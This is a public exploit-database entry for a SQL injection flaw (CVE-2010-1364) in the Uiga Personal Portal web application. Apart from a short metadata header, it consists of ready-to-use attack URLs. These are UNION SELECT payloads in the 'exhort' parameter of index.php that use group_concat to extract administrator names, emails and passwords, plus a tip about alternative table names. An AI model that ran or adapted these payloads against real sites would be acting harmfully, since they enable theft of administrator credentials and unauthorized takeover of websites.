
Uiga Personal Portal - 'index.php' 'view' SQL Injection

Author: 41.w4r10r
type: webapps
platform: php
port: 
date_added: 2010-04-25 
date_updated:  
verified: 0 
codes: CVE-2010-1364;OSVDB-62628 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comuigapersonalportal.zip

# Exploit Title: Uiga Personal Portal index.php (view) SQL Injection Vulnerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Software Link : http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: Web Application
# Tested on: Apache/Unix
# CVE : [if exists]
# Dork :
# Code :



Exploited Link :

http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'

Examples :

http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--

http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_email,0x3a,admin_password),8,9,10,11+from+tbl_admin--

Important: Sometimes the table name is administrators and sometimes it's admin